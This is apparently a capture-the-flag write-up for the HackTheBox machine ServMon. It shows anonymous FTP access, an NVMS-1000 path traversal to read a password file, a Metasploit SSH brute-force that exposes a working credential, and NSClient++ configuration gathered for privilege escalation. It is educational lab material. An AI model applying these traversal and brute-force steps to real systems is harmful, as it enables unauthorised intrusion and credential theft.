TL;DR: We have to find some hints on an FTP server, find creds through a path
traversal in NVMS-1000 and gain a low-privilege shell, then we EoP via
NSClient++ to get admin RCE.
```
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.93 seconds
```
We want to look at FTP (21), Web servers (80 & 8443) and Samba (139,445) first.
Nmap told us it was possible to connect to FTP anonymously but found nothing to
list, so let's try ourselves:
```
$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:noraj): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
```
```
$ searchsploit -p 46802
  Exploit: NSClient++ 0.5.2.35 - Privilege Escalation
      URL: https://www.exploit-db.com/exploits/46802
     Path: /usr/share/exploitdb/exploits/windows/local/46802.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
```
Hypothesis:
Once we have a low-privileged shell it will be possible to run a command
(`nscp web -- password --display`) or read the config of NSClient++ to retrieve
a user password. NSClient++ usually runs as a privileged user, so with an app user
we could create some tasks that will be run by the app daemon and gain more
privileges.
It's a false positive that occurs when the requested file has no extension.
(At first glance it seems the exploit is not working or the server is
not vulnerable.)
As we saw earlier, with the ftp CLI we didn't see anything.
But I tried again with FileZilla and this time saw two folders, with a file in
each:

- Nadine/Confidential.txt
- Nathan/Notes to do.txt
Confidential.txt

```
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
```

Notes to do.txt

```
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```
Let's use the NVMS-1000 path traversal again, but this time with
Users/Nathan/Desktop/Passwords.txt, thanks to the information we got from the FTP.
```
$ cat /usr/share/exploitdb/exploits/hardware/webapps/48311.py | dos2unix -c iso -q | python2 - http://10.10.10.184/ Users/Nathan/Desktop/Passwords.txt passwords.txt
dos2unix: active code page: 0
Host not vulnerable to Directory Traversal!
```
No file, but we are sure it's there. This exploit looks badly written, so it may be broken.
With curl, no result either:
```
$ curl 'http://10.10.10.184/../../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt' --head
HTTP/1.1 404 Not Found
Content-type: text/html
Content-Length: 0
Connection: close
AuthInfo:
```
Let's try the Metasploit module for the NVMS-1000 traversal instead:

```
Name       Current Setting   Required  Description
----       ---------------   --------  -----------
DEPTH      13                yes       Depth for Path Traversal
FILEPATH   /windows/win.ini  yes       The path to the file to read
Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      80                yes       The target port (TCP)
SSL        false             no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                 yes       The base URI path of nvms
THREADS    1                 yes       The number of concurrent threads (max one per host)
VHOST                        no        HTTP server virtual host
```

```
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH /Users/Nathan/Desktop/Passwords.txt
FILEPATH => /Users/Nathan/Desktop/Passwords.txt
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
```
With the looted passwords, let's brute-force SSH for the users nadine and nathan
using a Metasploit module.
```
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/noraj/.msf4/loot/20200611175532_default_10.10.10.184_nvms.traversal_675310.txt
PASS_FILE => /home/noraj/.msf4/loot/20200611175532_default_10.10.10.184_nvms.traversal_675310.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/noraj/CTF/HackTheBox/machines/ServMon/usernames.txt
USER_FILE => /home/noraj/CTF/HackTheBox/machines/ServMon/usernames.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' ''id' is not recognized as an internal or external command, operable program or batch file. '
[*] Command shell session 1 opened (10.10.15.26:45331 -> 10.10.10.184:22) at 2020-06-11 18:10:19 +0200
[-] 10.10.10.184:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof off'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
So a valid set of credentials was nadine:L1k3B1gBut7s@W0rk.
Metasploit automatically opened a session for us, but with cmd.exe. I prefer
to have a PowerShell shell.
```
$ ssh nadine@10.10.10.184 powershell.exe
nadine@10.10.10.184's password:
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6
```
Now let's read the NSClient++ configuration; the interesting parts are:

```ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled

; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -

; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]

; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar

; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]

allow arguments = true
```
`allowed hosts = 127.0.0.1` tells us we can authenticate only from localhost.
But as we have SSH access we can do some local port forwarding (you can read
about this technique in my article about pivoting).